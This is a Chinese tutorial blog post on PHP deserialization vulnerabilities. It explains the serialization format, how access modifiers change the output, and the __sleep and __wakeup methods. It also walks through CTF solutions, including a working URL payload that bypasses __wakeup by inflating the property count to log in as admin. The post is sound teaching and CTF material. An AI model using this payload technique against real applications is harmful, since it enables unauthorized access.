前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >PHP反序列化漏洞

PHP反序列化漏洞

作者头像
用户2700375
发布2022-06-09 14:33:39
4730
发布2022-06-09 14:33:39
举报
文章被收录于专栏:很菜的web狗很菜的web狗

序列化和反序列化的概念

序列化就是将一个对象转换成字符串。字符串包括 属性名 属性值 属性类型和该对象对应的类名。

反序列化则相反将字符串重新恢复成对象

对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。

ctf很多题型也都是考察PHP反序列化的相关知识

PHP的序列化

序列化函数serialize()

首先我创一个Ctf类 里面写了三个属性 后创建了一个ctfer对象 将Ctf类里的信息进行了改变。如果后面还要用到这个对象,就可以先将这个对象进行实例化。用的时候在反序列化出来就ok了

QQ截图20190919102429.png
QQ截图20190919102429.png
代码语言:javascript
复制
O:3:"Ctf":3{s:4:"flag";s:13:"flag{abedyui}";s:4:"name";s:7:"Sch0lar";s:3:"age";s:2:"18";}
O代表对象 因为我们序列化的是一个对象 序列化数组则用A来表示
3 代表类名字占三个字符 
ctf 类名
3 代表三个属性
s代表字符串
4代表属性名长度
flag属性名
s:13:"flag{abedyui}" 字符串 属性值长度 属性值

serialize() 函数会检查类中是否存在一个魔术方法 __sleep()。如果存在,__sleep()方法会先被调用,然后才执行序列化操作。

可以再__sleep()方法里可以决定哪些属性被序列化

如果没有__sleep()方法则默认序列化所有属性

QQ截图20190919144609.png
QQ截图20190919144609.png

上图__sleep()方法使flag age 属性序列化 name并没有被序列化

访问控制修饰符

根据访问控制修饰符的不同 序列化后的 属性长度和属性值会有所不同,所以这里简单提一下

代码语言:javascript
复制
public(公有)
protected(受保护)
private(私有的)

protected属性被序列化的时候属性值会变成%00*%00属性名

private属性被序列化的时候属性值会变成%00类名%00属性名

可能有点难理解 这里我敲一下大家就懂了

QQ截图20191127080323.png
QQ截图20191127080323.png
代码语言:javascript
复制
O:3:"Ctf":3:{s:4:"name";s:7:"Sch0lar";s:6:"*age";s:2:"19";s:9:"Ctfflag";s:8:"get flag";}

可以看到

代码语言:javascript
复制
s:6:"*age" //*前后出现了两个%00也就是空白符 一个%00长度为一 所以序列化后 该属性长度为6
s:9:"Ctfflag" //ctf前后也就是类名前后出现两个%00 所以长度为9

PHP的反序列化

反序列化函数unserialize()

反序列化就是将一个序列化的字符串,还原回去

QQ截图20190919150407.png
QQ截图20190919150407.png

与 序列化函数类似 unserialize() 会检查是否存在一个 __wakeup()魔术方法

如果存在则会先调用__wakeup()方法在进行反序列化

可以再__wakeup()方法中对属性进行初始化或者改变。

QQ截图20190919151650.png
QQ截图20190919151650.png

反序列化之前重新给flag属性赋值

当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。这个大家应该都知道很常见的姿势了。为了直观一点找了些考察反序列化的ctf。

ctf

QQ截图20190919153615.png
QQ截图20190919153615.png

首先我们本地进行序列化后得到字符串

代码语言:javascript
复制
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
QQ截图20191127082519.png
QQ截图20191127082519.png

把1写成2 达到绕过wakeup()效果 拿到flag

test.png
test.png

找到一个 比较能总结这篇文章的题

QQ截图20191124105054.png
QQ截图20191124105054.png

看到良好的备份网站习惯

url上直接/www.zip下载了网站源码

index.php里发现核心代码

代码语言:javascript
复制
<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
?>

读了class.php 发现需要 username=admin 并且 password=100才可以 还有一段核心代码

代码语言:javascript
复制
function __wakeup(){
        $this->username = 'guest';
}
QQ截图20191127084929.png
QQ截图20191127084929.png

我们本地进行实例化 序列化

代码语言:javascript
复制
$a = new Name('admin',100);
$b = serialize($a);
print_r($b);

得到序列化后的字符串为

代码语言:javascript
复制
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

代码中存在 __wakeup前面说过。

当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。

还有因为我们要通过get方式进行提交 所以%00也必须写在url上

最终payload为

代码语言:javascript
复制
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
QQ截图20191124110502.png
QQ截图20191124110502.png
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2019-09-19,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 序列化和反序列化的概念
  • PHP的序列化
  • 访问控制修饰符
  • PHP的反序列化
  • ctf
相关产品与服务
文件存储
文件存储(Cloud File Storage,CFS)为您提供安全可靠、可扩展的共享文件存储服务。文件存储可与腾讯云服务器、容器服务、批量计算等服务搭配使用,为多个计算节点提供容量和性能可弹性扩展的高性能共享存储。腾讯云文件存储的管理界面简单、易使用,可实现对现有应用的无缝集成;按实际用量付费,为您节约成本,简化 IT 运维工作。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档